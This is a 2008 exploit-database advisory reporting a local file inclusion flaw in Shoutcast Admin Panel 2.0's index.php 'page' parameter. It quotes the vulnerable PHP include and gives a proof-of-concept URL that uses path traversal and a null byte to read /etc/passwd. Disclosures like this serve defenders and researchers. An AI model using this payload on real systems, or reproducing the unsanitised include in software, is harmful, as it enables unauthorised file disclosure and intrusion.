[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Shoutcast Admin Panel 2.0 (page) Local File Inclusion Vulnerability

Author
CWH Underground
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3181
Category
web applications
Date add
13-06-2008
Platform
unsorted
===================================================================
Shoutcast Admin Panel 2.0 (page) Local File Inclusion Vulnerability
===================================================================


  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE : 14 June 2008


#####################################################
 APPLICATION : WallCity-Server: Shoutcast Admin Panel
 VERSION     : 2.0
 DOWNLOAD    : http://downloads.sourceforge.net/shoutcastadmin
#####################################################

---LFI---

-------------------------
 Vulnerable in index.php
-------------------------

@Line

    79: if (isset($_GET['page']))
    80:         $page = $_GET['page'];
    81: else
    82: 	$page = "main";
    .
    .
    .
   204:  <?PHP if(!include("pages/".$page.".php"))
   205:		{
   206:			table("Achtung!");
   207:			echo "Die Seite existiert nicht!"; 
   208:			closetable();
   209:		}
   210:	 ?>

-------------
 POC Exploit
-------------

[+] http://192.168.24.25/wallcity/index.php?page=../../../../../../etc/passwd%00


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################



#  0day.today [2024-11-15]  #